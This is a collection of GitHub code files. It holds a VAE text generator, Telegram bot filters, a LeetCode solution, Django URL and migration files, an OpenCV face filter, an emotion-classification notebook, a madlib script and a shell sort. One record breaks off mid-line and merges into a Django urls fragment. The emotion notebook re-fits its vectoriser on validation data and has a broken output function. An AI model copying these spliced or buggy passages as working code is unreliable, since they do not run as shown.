+{"seq_id":"32421643742","text":"\"\"\" VAE for Text Generation\nThis is for Module 1: Candidates Generation.\nUsage: python VAE_Text_Generation.py --dataset reddit\n\"\"\"\nimport argparse\nimport math\nimport os\nimport numpy as np\nimport torch as T\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nfrom utility.VAE_Text_Generation.dataset import get_iterators\nfrom utility.VAE_Text_Generation.helper_functions import get_cuda\nfrom utility.VAE_Text_Generation.model import VAE\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batch_size', type=int, default=8)\nparser.add_argument('--n_vocab', type=int, default=12000)\nparser.add_argument('--epochs', type=int, default=1000)\nparser.add_argument('--n_hidden_G', type=int, default=512)\nparser.add_argument('--n_layers_G', type=int, default=2)\nparser.add_argument('--n_hidden_E', type=int, default=512)\nparser.add_argument('--n_layers_E', type=int, default=1)\nparser.add_argument('--n_z', type=int, default=100)\nparser.add_argument('--word_dropout', type=float, default=0.5)\nparser.add_argument('--rec_coef', type=float, default=7)\nparser.add_argument('--lr', type=float, default=0.00001)\nparser.add_argument('--gpu', type=int, default=0)\nparser.add_argument('--n_highway_layers', type=int, default=2)\nparser.add_argument('--n_embed', type=int, default=300)\nparser.add_argument('--out_num', type=int, default=30000)\nparser.add_argument('--unk_token', type=str, default=\"\")\nparser.add_argument('--pad_token', type=str, default=\"\")\nparser.add_argument('--start_token', type=str, default=\"\")\nparser.add_argument('--end_token', type=str, default=\"\")\nparser.add_argument('--dataset', type=str, default=\"reddit\")\nparser.add_argument('--training', action='store_true')\nparser.add_argument('--resume_training', action='store_true')\n\n\nopt = parser.parse_args()\nprint(opt)\nsave_path = \"tmp/saved_VAE_models/\" + opt.dataset + \".tar\"\nprint(save_path)\nif not os.path.exists(\"tmp/saved_VAE_models\"):\n os.makedirs(\"tmp/saved_VAE_models\")\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = str(opt.gpu)\n\ncandidates_path = opt.dataset + '_for_VAE.txt'\ntrain_iter, val_iter, vocab = get_iterators(opt, path='./data/', fname=candidates_path)\nopt.n_vocab = len(vocab)\nif opt.training:\n vae = VAE(opt)\n vae.embedding.weight.data.copy_(vocab.vectors) #Intialize trainable embeddings with pretrained glove vectors\n vae = get_cuda(vae)\n trainer_vae = T.optim.Adam(vae.parameters(), lr=opt.lr)\nelse:\n checkpoint = T.load(save_path)\n vae = checkpoint['vae_dict']\n trainer_vae = checkpoint['vae_trainer']\n if 'opt' in checkpoint:\n opt_old = checkpoint['opt']\n print(opt_old)\n\n\ndef create_generator_input(x, train):\n G_inp = x[:, 0:x.size(1)-1].clone()\t #input for generator should exclude last word of sequence\n if train == False:\n return G_inp\n r = np.random.rand(G_inp.size(0), G_inp.size(1)) #Perform word_dropout according to random values (r) generated for each word\n for i in range(len(G_inp)):\n for j in range(1, G_inp.size(1)):\n if r[i, j] < opt.word_dropout and G_inp[i, j] not in [vocab.stoi[opt.pad_token], vocab.stoi[opt.end_token]]:\n G_inp[i, j] = vocab.stoi[opt.unk_token]\n return G_inp\n\n\ndef train_batch(x, G_inp, step, train=True):\n logit, _, kld = vae(x, G_inp, None, None)\n logit = logit.view(-1, opt.n_vocab)\t #converting into shape (batch_size*(n_seq-1), n_vocab) to facilitate performing F.cross_entropy()\n x = x[:, 1:x.size(1)]\t #target for generator should exclude first word of sequence\n x = x.contiguous().view(-1)\t #converting into shape (batch_size*(n_seq-1),1) to facilitate performing F.cross_entropy()\n rec_loss = F.cross_entropy(logit, x)\n kld_coef = (math.tanh((step - 15000)/1000) + 1) / 2\n # kld_coef = min(1,step/(200000.0))\n loss = opt.rec_coef*rec_loss + kld_coef*kld\n if train==True:\t #skip below step if we are performing validation\n trainer_vae.zero_grad()\n loss.backward()\n trainer_vae.step()\n return rec_loss.item(), kld.item()\n\n\n# def load_model_from_checkpoint():\n # global vae, trainer_vae\n # checkpoint = T.load(save_path)\n # vae.load_state_dict(checkpoint['vae_dict'])\n # trainer_vae.load_state_dict(checkpoint['vae_trainer'])\n # return checkpoint['step'], checkpoint['epoch']\n\n\ndef training():\n start_epoch = step = 0\n if opt.resume_training:\n step, start_epoch = checkpoint['step'], checkpoint['epoch']\n for epoch in range(start_epoch, opt.epochs):\n vae.train()\n train_rec_loss = []\n train_kl_loss = []\n for batch in train_iter:\n x = get_cuda(batch.text) \t #Used as encoder input as well as target output for generator\n G_inp = create_generator_input(x, train=True)\n rec_loss, kl_loss = train_batch(x, G_inp, step, train=True)\n train_rec_loss.append(rec_loss)\n train_kl_loss.append(kl_loss)\n step += 1\n\n vae.eval()\n valid_rec_loss = []\n valid_kl_loss = []\n for batch in val_iter:\n x = get_cuda(batch.text)\n G_inp = create_generator_input(x, train=False)\n with T.autograd.no_grad():\n rec_loss, kl_loss = train_batch(x, G_inp, step, train=False)\n valid_rec_loss.append(rec_loss)\n valid_kl_loss.append(kl_loss)\n\n train_rec_loss = np.mean(train_rec_loss)\n train_kl_loss = np.mean(train_kl_loss)\n valid_rec_loss = np.mean(valid_rec_loss)\n valid_kl_loss = np.mean(valid_kl_loss)\n\n print(\"No.\", epoch, \"T_rec:\", '%.2f' % train_rec_loss, \"T_kld:\", '%.2f' % train_kl_loss, \"V_rec:\", '%.2f' % valid_rec_loss, \"V_kld:\", '%.2f' % valid_kl_loss)\n if epoch >= 50 and epoch % 10 == 0:\n print('save model ' + str(epoch) + '...')\n T.save({'epoch': epoch + 1, 'vae_dict': vae, 'vae_trainer': trainer_vae, 'step': step, 'opt': opt}, save_path)\n generate_sentences(5)\n\n\ndef generate_sentences(n_examples, save=0):\n vae.eval()\n out = []\n for i in tqdm(range(n_examples)):\n z = get_cuda(T.randn([1, vae.n_z]))\n h_0 = get_cuda(T.zeros(vae.generator.n_layers_G, 1, vae.generator.n_hidden_G))\n c_0 = get_cuda(T.zeros(vae.generator.n_layers_G, 1, vae.generator.n_hidden_G))\n G_hidden = (h_0, c_0)\n G_inp = T.LongTensor(1, 1).fill_(vocab.stoi[opt.start_token])\n G_inp = get_cuda(G_inp)\n out_str = \"\"\n while (G_inp[0][0].item() != vocab.stoi[opt.end_token]) and (G_inp[0][0].item() != vocab.stoi[opt.pad_token]):\n with T.autograd.no_grad():\n logit, G_hidden, _ = vae(None, G_inp, z, G_hidden)\n probs = F.softmax(logit[0], dim=1)\n G_inp = T.multinomial(probs, 1)\n out_str += (vocab.itos[G_inp[0][0].item()]+\" \")\n print(out_str[:-6])\n out.append(out_str[:-6])\n if save:\n original = []\n with open('./data/' + candidates_path, 'r') as fin:\n for line in fin:\n original.append(line.strip())\n fname = './data/' + opt.dataset + '_candidates.txt'\n with open(fname, 'w') as fout:\n for i in out + original:\n fout.write(i)\n fout.write('\\n')\n\n\nif __name__ == '__main__':\n if opt.training or opt.resume_training:\n training()\n generate_sentences(opt.out_num, save=1)\n else:\n generate_sentences(opt.out_num, save=1)\n","repo_name":"WanzhengZhu/GPS","sub_path":"VAE_Text_Generation.py","file_name":"VAE_Text_Generation.py","file_ext":"py","file_size_in_byte":7608,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"69"}
+{"seq_id":"70538132060","text":"import logging\nfrom typing import Optional, Union, Collection\n\nfrom aiogram import Dispatcher\nfrom aiogram.dispatcher.filters import BoundFilter\nfrom aiogram.dispatcher.handler import ctx_data\nfrom aiogram.types import CallbackQuery\nfrom aiogram.types.base import TelegramObject\n\nfrom ..config import Role\n\n\nclass RoleFilter(BoundFilter):\n key = 'role'\n\n def __init__(\n self,\n role: Union[None, Role, Collection[Role]] = None,\n ):\n if role is None:\n self.roles = None\n elif isinstance(role, Role):\n self.roles = {role}\n else:\n self.roles = set(role)\n\n async def check(self, obj: TelegramObject):\n if self.roles is None:\n return True\n data = ctx_data.get()\n return data.get(\"role\") in self.roles\n\n\nclass SuperuserFilter(BoundFilter):\n key = 'is_superuser'\n\n def __init__(self, is_superuser: Optional[bool] = None):\n self.is_superuser = is_superuser\n\n async def check(self, obj: TelegramObject):\n if self.is_superuser is None:\n return True\n data = ctx_data.get()\n\n return (data.get(\"role\") is Role.SUPERUSER) == self.is_superuser\n\n\nclass FileSelectionMenuAccessFilter(BoundFilter):\n\n async def check(self, call: CallbackQuery):\n state = Dispatcher.get_current().current_state()\n state_data = await state.get_data()\n applicant_role = state_data.get('role')\n free_files_in_google_folder = state_data.get('free_files')\n if applicant_role == Role.EMPLOYEE.value and free_files_in_google_folder:\n return {'files': free_files_in_google_folder}\n","repo_name":"DerSerhii/WorkScheduleBot","sub_path":"schedulebot/filters/role.py","file_name":"role.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40666049942","text":"class Solution:\n def maxVowels(self, s: str, k: int) -> int:\n \n maxVowels = -1\n idx = 0\n size = len(s)\n count = 0\n vowels = [\"a\",\"e\",\"i\",\"o\",\"u\"]\n \n for i in range(0,k):\n if s[i] in vowels:\n count+=1\n \n #print(idx,count)\n maxVowels = max(count,maxVowels)\n idx = 1\n \n while(idx<=(size-k+1)):\n if idx-1 >= 0 and s[idx-1] in vowels:\n count-=1\n if (idx+k-1)/', views.StudentAPI.as_view()),\n# path('swagger/', schema_view.with_ui('swagger', cache_timeout=0),name='schema-swagger-ui'),\n# ]\n\n\n# GenericAPIView and Model Mixing\n\n# urlpatterns = [\n# path('admin/', admin.site.urls),\n# path('studentapi/', views.LCStudentList.as_view()),\n# path('studentapi//', views.RUDStudentAPI.as_view()),\n \n# ]\n \nurlpatterns = [\n path('admin/', admin.site.urls),\n path('studentapi/', views.StudentLC.as_view()),\n path('studentapi//', views.StudentRUD.as_view()),\n \n]\n \n\n\n","repo_name":"maheenkhalid-coder/CRUD-api","sub_path":"crud/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"3501940632","text":"from turtle import width\nimport cv2\nimport imutils\n\ncap = cv2.VideoCapture(0)\n\nfilter = cv2.imread(r'input_assets\\2022logo.png',cv2.IMREAD_UNCHANGED)\n\n#instantiate classifier\nfaceDet = cv2.CascadeClassifier('input_assets\\haarcascade_frontalface_default.xml')\n\n\nvideo = []\n\n\nwhile True:\n\n ret, frame = cap.read()\n frame = cv2.flip(frame,1)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n if not ret: break\n\n\n\n faces = faceDet.detectMultiScale(gray, 1.2,6)\n\n for (x,y,w,h) in faces:\n #cv2.rectangle(frame,(x,y), (x+w, y+h),(0,255,0), 2)\n \n resizedFilter = imutils.resize(filter, width=w)\n heightFilter = resizedFilter.shape[0]\n widthFilter = w\n\n #This is to make the filter show a little bit below the upper border of the rectangle face.\n showBelow = heightFilter // 5\n\n dif = 0\n\n yFilter = y-heightFilter+showBelow\n # Adding filter to frame on top of the face detected\n if yFilter >= 0:\n filterArea = frame[yFilter:y+showBelow, x:x+w] \n else:\n dif = abs(yFilter)\n filterArea = frame[0:y+showBelow,x:x+w]\n \n\n filterMask = resizedFilter[:,:, 3]\n \n filterMaskInv = cv2.bitwise_not(filterMask)\n\n bgBlack= cv2.bitwise_and(resizedFilter,resizedFilter,mask=filterMask)\n bgBlack = bgBlack[dif:,:,:3]\n\n bgFrame = cv2.bitwise_and(filterArea,filterArea, mask=filterMaskInv[dif:,:])\n\n result = cv2.add(bgBlack,bgFrame)\n\n if yFilter >= 0:\n frame[yFilter:y+showBelow, x:x+w] = result\n else:\n frame[0:y+showBelow, x:x+w] = result\n \n video.append(frame)\n cv2.imshow('video', frame)\n \n\n k =cv2.waitKey(1)\n\n if k == ord('q'):\n break\n\n\n# FPS = cap.get(5) #Frames\n\n# Width = int(cap.get(3)) #Width\n# Height = int(cap.get(4)) #Height\n\n# fourcc = cv2.VideoWriter_fourcc(*'avc1')\n# out = cv2.VideoWriter(r\"output_assets\\face_filter.mp4\",fourcc, FPS, (Width,Height)) \n\n# for img in video:\n# out.write(img)\n# out.release()\n# cap.release()","repo_name":"Alefig12/opencv-learning","sub_path":"day11/28-faceFilters.py","file_name":"28-faceFilters.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"11339575793","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n#pip install textblob\n\n\n# In[4]:\n\n\n#pip install emot\n\n\n# In[ ]:\n\n\n#pip install\n\n\n# In[ ]:\n\n\n#pip install\n\n\n# In[7]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport collections\nimport nltk\nimport io\nfrom textblob import Word\nimport re\nimport sys, os, csv\nimport string\nfrom sklearn import preprocessing\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom emot.emo_unicode import UNICODE_EMOJI #,EMOTICONS\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import wordnet\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem import WordNetLemmatizer\nfrom collections import Counter\n\n\n# # Data Cleaning\n\n# In[8]:\n\n\ndef word_prob(word): return dictionary[word] / total\ndef words(text): return re.findall('[a-z]+', text.lower())\ndictionary = Counter(words(open('dataset/wordlists/merged.txt').read()))\nmax_word_length = max(map(len, dictionary))\ntotal = float(sum(dictionary.values()))\n\ndef viterbi_segment(text):\n probs, lasts = [1.0], [0]\n for i in range(1, len(text) + 1):\n prob_k, k = max((probs[j] * word_prob(text[j:i]), j)\n for j in range(max(0, i - max_word_length), i))\n probs.append(prob_k)\n lasts.append(k)\n words = []\n i = len(text)\n while 0 < i:\n words.append(text[lasts[i]:i])\n i = lasts[i]\n words.reverse()\n return words, probs[-1]\n\ndef fix_hashtag(text):\n text = text.group().split(\":\")[0]\n text = text[1:] # remove '#'\n try:\n test = int(text[0])\n text = text[1:]\n except:\n pass\n output = ' '.join(viterbi_segment(text)[0])\n return output\n\ndef prep(tweet):\n \"\"\"pattern = re.compile(r\"(.)\\1{2,}\")\n tweet = pattern.sub(r\"\\1\\1\", str(tweet))\n tweet = re.sub(r'http.?://[^\\s]+[\\s]?', '', str(tweet))\n punct = string.punctuation\n trantab = str.maketrans(punct, len(punct) * ' ') # Every punctuation symbol will be replaced by a space\n tweet = tweet.translate(trantab)\n tweet = tweet.lower()\n tweet = tweet.strip()\"\"\"\n \n tweet = tweet.lower()\n tweet = re.sub(\"(#[A-Za-z0-9]+)\", fix_hashtag, tweet)\n tweet = ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n \n tweet = re.sub('\\d+', '', str(tweet))\n def get_wordnet_pos(word):\n tag = nltk.pos_tag([word])[0][1][0].upper()\n tag_dict = {\"J\": wordnet.ADJ, \"N\": wordnet.NOUN, \"V\": wordnet.VERB, \"R\": wordnet.ADV}\n return tag_dict.get(tag, wordnet.NOUN) \n \n ps = PorterStemmer()\n words = tweet.split()\n lemmatizer = WordNetLemmatizer()\n lemma_words = [lemmatizer.lemmatize(word, get_wordnet_pos(word)) for word in words]\n tweet = \" \".join(lemma_words)\n \n stopwords_list = stopwords.words('english')\n # Some words which might indicate a certain sentiment are kept via a whitelist\n whitelist = [\"n't\", \"not\", \"no\"]\n words = tweet.split()\n clean_words = [word for word in words if (word not in stopwords_list or word in whitelist) and len(word) > 1]\n tweet = \" \".join(clean_words)\n \n tweet = tweet.strip()\n return tweet\n\ndef vectorise_label(label):\n if label == \"empty\":return 0\n elif label == \"sadness\":return 2\n elif label == \"enthusiasm\":return 1\n elif label == \"neutral\":return 0\n elif label == \"worry\":return 2\n elif label == \"surprise\":return 1\n elif label == \"love\":return 3\n elif label == \"fun\":return 1\n elif label == \"hate\":return 4\n elif label == \"happiness\":return 1\n elif label == \"boredom\":return 0\n elif label == \"relief\":return 1\n elif label == \"anger\":return 4\n\n\n# In[ ]:\n\n\ndata1 = pd.read_csv(\"crawled_csv/processes/sad_processes.csv\", sep=',', encoding='utf-8')\ndataWriter = csv.writer(open('crawled_csv/prep/sad_prep.csv', 'w'), delimiter=',',lineterminator=\"\\n\")\ntotal = 2000\nfor i in range(2000):\n tweet= prep(data1.iloc[:,0][i])\n dataWriter.writerow([tweet, 2]) \nprint(\"Done!\")\n\n\n# In[225]:\n\n\ncount = 0\nwith open('crawled_csv/prep/sad_prep.csv', encoding = \"utf8\") as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n count+=1\nprint(count)\n\n\n# In[245]:\n\n\ndata2 = pd.read_csv('dataset/data/text_emotion.csv', sep=',', encoding='utf-8')\nprint(\"Dataset shape:\",data2.shape)\nprint(data2.sentiment[0],\":\",data2.content[0])\n\n\n# In[251]:\n\n\ndataWriter = csv.writer(open('cleaned_data/data_prep.csv', 'w', encoding='utf-8'), delimiter=',',lineterminator=\"\\n\")\n\ntotal = 40000\nfor i in range(40000):\n tweet= prep(data2.content[i])\n dataWriter.writerow([tweet, str(vectorise_label(data2.sentiment[i]))])\n \nprint(\"Progress: \",100,\"\\nComplete!\")\n\n\n# In[252]:\n\n\ncount = 0\nwith open('cleaned_data/data_prep.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n for row in readCSV:\n count+=1\nprint(count)\n\n\n# ## Cleaned data file\n\n# In[38]:\n\n\ndata_train = pd.read_csv('cleaned_data/emotion_data_prep.csv', sep=',', encoding='utf-8')\nprint(\"Dataset shape:\",data_train.shape)\n\n\n# In[39]:\n\n\ncount = data_train.iloc[:,1].value_counts()\nplt.figure(figsize=(9,7))\nsns.barplot(count.index, count.values, alpha=0.8, palette=\"plasma\")\nplt.ylabel('Count', fontsize=12)\nplt.xlabel('Emotions', fontsize=12)\nplt.show()\n# 0 = neutral\n# 1 = happy\n# 2 = sad\n# 3 = love\n# 4 = anger\n\n\n# # Test Train Split\n\n# In[9]:\n\n\nX_train = data_train.iloc[:,0][:49611]\n#[:47583]\ny_train = data_train.iloc[:,-1][:49611]\n#[:47583]\nX_val = data_train.iloc[:,0][49612:]\n#[47584:]\ny_val = data_train.iloc[:,-1][49612:]\n#[47584:]\n\n\n# # TF-IDF Vectorizer\n\n# In[10]:\n\n\ntfidf = TfidfVectorizer(max_features=1000, analyzer='word',ngram_range=(1,3))\nX_train_tfidf = tfidf.fit_transform(X_train.astype('U'))\nX_val_tfidf = tfidf.fit_transform(X_val.astype('U'))\nprint(tfidf.vocabulary_)\n\n\n# In[11]:\n\n\nbow = tfidf.fit_transform(data_train.iloc[:,0].astype('U'))\nword_freq = dict(zip(tfidf.get_feature_names(), np.asarray(bow.sum(axis=0)).ravel()))\nword_counter = collections.Counter(word_freq)\nword_counter_df = pd.DataFrame(word_counter.most_common(30), columns = ['word', 'freq'])\nfig, ax = plt.subplots(figsize=(15, 10))\nsns.barplot(x=\"word\", y=\"freq\", data= word_counter_df, ax=ax, palette=\"plasma\")\nplt.show();\n\n\n# # Count Vectorizer\n\n# In[12]:\n\n\n# Extracting Count Vectors Parameters\ncount_vect = CountVectorizer(analyzer='word')\ncount_vect.fit(data_train.iloc[:,0].astype('U'))\nX_train_count = count_vect.transform(X_train.astype('U'))\nX_val_count = count_vect.transform(X_val.astype('U'))\nprint(count_vect.vocabulary_)\n\n\n# In[13]:\n\n\nbow = count_vect.fit_transform(data_train.iloc[:,0].astype('U'))\nprint(bow.shape)\nword_freq = dict(zip(count_vect.get_feature_names(), np.asarray(bow.sum(axis=0)).ravel()))\nword_counter = collections.Counter(word_freq)\nword_counter_df = pd.DataFrame(word_counter.most_common(30), columns = ['word', 'freq'])\nfig, ax = plt.subplots(figsize=(15, 10))\nsns.barplot(x=\"word\", y=\"freq\", data= word_counter_df, ax=ax, palette=\"plasma\")\nplt.show();\n\n\n# # Building models using different classifiers (TF-IDF vectorizer)\n\n# ### Model 1: Multinomial Naive Bayes Classifier\n\n# In[14]:\n\n\nnb = MultinomialNB()\nnb.fit(X_train_tfidf, y_train)\ny_pred = nb.predict(X_val_tfidf)\nprint('naive bayes tfidf accuracy %s' % accuracy_score(y_pred, y_val))\n# naive bayes tfidf accuracy 0.3837284308982422\n\n\n# ### Model 2: Linear SVM\n\n# In[15]:\n\n\nlsvm = SGDClassifier(alpha=0.001, random_state=5, max_iter=15, tol=None)\nlsvm.fit(X_train_tfidf, y_train)\ny_pred = lsvm.predict(X_val_tfidf)\nprint('svm using tfidf accuracy %s' % accuracy_score(y_pred, y_val))\n# svm tfidf accuracy 0.38493791323980003\n\n\n# ### Model 3: logistic regression\n\n# In[16]:\n\n\nlogreg = LogisticRegression(C=1, max_iter=1000)\nlogreg.fit(X_train_tfidf, y_train)\ny_pred = logreg.predict(X_val_tfidf)\nprint('log reg tfidf accuracy %s' % accuracy_score(y_pred, y_val))\n# log reg tfidf accuracy 0.4013868730849863\n\n\n# # Building models using different classifiers (Count vectorizer)\n\n# ### Model 1: Multinomial Naive Bayes Classifier\n\n# In[19]:\n\n\nnb1 = MultinomialNB()\nnb1.fit(X_train_count, y_train)\ny_pred = nb1.predict(X_val_count)\nprint('naive bayes count vectors accuracy %s' % accuracy_score(y_pred, y_val))\n# naive bayes count_vect accuracy 0.584663763909047\n\n\n# ### Model 2: Logistic Regression\n\n# In[24]:\n\n\nlogreg1 = LogisticRegression(C=1, max_iter=500)\nlogreg1.fit(X_train_count, y_train)\ny_pred = logreg1.predict(X_val_count)\nprint('log reg count vectors accuracy %s' % accuracy_score(y_pred, y_val))\n# log reg count_vect accuracy 0.6247379454926625\n\n\n# ### Model 3: Linear SVM\n\n# In[34]:\n\n\nlsvm1 = SGDClassifier(alpha=0.001, random_state=5, max_iter=2, tol=None)\nlsvm1.fit(X_train_count, y_train)\ny_pred = lsvm1.predict(X_val_count)\nprint('lsvm using count vectors accuracy %s' % accuracy_score(y_pred, y_val))\n# svm count_vect accuracy 0.620061280438639\n\n\n# # Testing\n\n# In[22]:\n\n\ntweets = pd.DataFrame([\"For instance, giving a kiss to your younger sibling daily after waking up in the morning and showing him how much you love them. For some happiness means loving life and seeing others happy. While some finds happiness in writing stories. Some conquer happiness in being simple yet the best person they can ever be. Everyone has their own unique way to feel happy by finding things that they never expected to find.\", # happy\n \"Love is the key to happiness. We all want to lead a happy life. People look around for happiness in power, fashion, wealth, drugs etc. But these things can only give temporary pleasures. The power of love can create miracles. Love can create unity among nations and its citizens. Love is the most beautiful feeling in the world. Love has given different meaning by different people depending upon how they have experienced this wonderful feeling.\", # love\n \"One day I was studying in my room when, all of a sudden, i heard hot words being exchanged between two persons in the street. I paid no attention, thinking it would be a minor quarrel but soon I heard the voices of a large number of people. I peeped from the window and saw that there was a street quarrel. I went downstairs and reached the spot in the twinkling of an eyes. I was at my wits end on seeing that both of them had come to blows. The people were standing around them and enjoying their quarrel but none tried to pacify them.\", # sad\n \"I am so angry at you!!!!!\", # anger\n \"you ve hit a new low with a danger of blm fascist slogan please stop it before too late stop\", # anger\n \"I love my doggg\", # love\n \"I think i'm gonna be sick :'‑(\", # sad\n \"I hate you so much\", # anger\n \"I'm at work\", # neutral\n \"@TheTombert i was watching Harpers Island, lol... there was no vodka involved\", # neutral\n \"sometimes i wish things could go back to the way they were the beginning of last summer\", # sad\n \"it's your 18th birthday finally!!! yippeeeee\", # happy\n \"still waiting in line\", # neutral\n \"aarrgghh - fu*k.....a hose has leaked water all over the new floating floor\", # anger\n \"that b*tch is so ugly\", # anger\n \"oh no he is hospitalised!!!\", # sad\n ])\n\ntweet_count = count_vect.transform(tweets[0])\n\n\n# In[43]:\n\n\n#Predicting the emotion of the tweet \ntweet_pred = logreg1.predict(tweet_count)\nprint(tweet_pred)\ntweets[0]\n# 0 = neutral\n# 1 = happy\n# 2 = sad\n# 3 = love\n# 4 = anger\n\n\n# In[44]:\n\n\nfinal_result=tweets.copy()\n\n\n# In[45]:\n\ndef output():\n final_result['result']=tweet_pred\n final_result=final_result.rename(columns={0:\"tweets\"})\n final_result=final_result.rename(columns={\"result\":\"predicted_emotion\"})\n final_result=final_result.replace({0: 'Neutral', 1: 'Happy', 2: 'Sad', 3: 'Love', 4: 'Anger'})\n final_result\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"lancelooottt/MindGraph","sub_path":"app/src/main/python/MLModels.py","file_name":"MLModels.py","file_ext":"py","file_size_in_byte":12184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31261169723","text":"f = open(\"madlibtest.txt\", \"r\")\n#empty string to store story\nstory = ''\n\nlineno = 1\nmadlib = \"\"\ntext = \"\"\nfor line in f:\n if line.startswith(\"*\"):\n #output as command, strip\n text = input('Give me a(n) ' + line[1:].strip() + ': ')\n else:\n #put lint onto madlib\n text = line\n #put text onto madlib\n madlib = madlib + \" \" + text.strip()\n#why is my madlib so awkward looking?\nprint(\"here is your madlib: \"+madlib)\nf.close()\n\nimport os\n\n#get path of this directory (because i sure don't know it)\ndir_path = os.getcwd()\n#put all filenames into dir_list\ndir_list = os.listdir(dir_path)\n\n#make list for text files\ntxt_files = []\nfor f in dir_list:\n #filter by those ending in .txt\n if f.endswith(\".txt\"):\n txt_files.append(f)\n\n#print text files\nprint(\"text files in this directory:\")\nfor t in txt_files:\n print(t)","repo_name":"rlsoderberg/rebeccaCS100","sub_path":"cs100a/module5/amadlibs.py","file_name":"amadlibs.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33078337299","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Game',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('grid_width', models.IntegerField()),\n ('grid_height', models.IntegerField()),\n ('observer_log', models.TextField()),\n ],\n ),\n migrations.CreateModel(\n name='Move',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('order', models.IntegerField(db_index=True)),\n ('game', models.ForeignKey(to='battleship_viewer.Game')),\n ],\n options={\n 'ordering': ['order'],\n },\n ),\n migrations.CreateModel(\n name='Player',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name='Ship',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('game', models.ForeignKey(to='battleship_viewer.Game')),\n ('player', models.ForeignKey(to='battleship_viewer.Player')),\n ],\n ),\n migrations.CreateModel(\n name='ShipLocation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('x', models.IntegerField()),\n ('y', models.IntegerField()),\n ('ship', models.ForeignKey(to='battleship_viewer.Ship')),\n ],\n ),\n migrations.CreateModel(\n name='Shot',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('x', models.IntegerField()),\n ('y', models.IntegerField()),\n ('move', models.ForeignKey(to='battleship_viewer.Move')),\n ('player', models.ForeignKey(to='battleship_viewer.Player')),\n ],\n ),\n migrations.AddField(\n model_name='game',\n name='player1',\n field=models.ForeignKey(related_name='player1', to='battleship_viewer.Player'),\n ),\n migrations.AddField(\n model_name='game',\n name='player2',\n field=models.ForeignKey(related_name='player2', to='battleship_viewer.Player'),\n ),\n migrations.AddField(\n model_name='game',\n name='winner',\n field=models.ForeignKey(related_name='winner', to='battleship_viewer.Player', null=True),\n ),\n ]\n","repo_name":"okcpython/battleship_django","sub_path":"battleship_viewer/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"71677133661","text":"def shell_sort(arr):\n n = len(arr)\n gap = n // 2\n\n while gap > 0:\n for i in range(gap, n):\n temp = arr[i]\n k = i\n\n while k >= gap and arr[k - gap] > temp:\n arr[k] = arr[k - gap]\n k -= gap\n\n arr[k] = temp\n\n gap //= 2\n\n return arr\n\n\nprint(shell_sort([4, 6, 8, 3, 2, 1, 6]))\n","repo_name":"christianstefaniw/PythonAlgorithms","sub_path":"sorting/shell_sort.py","file_name":"shell_sort.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
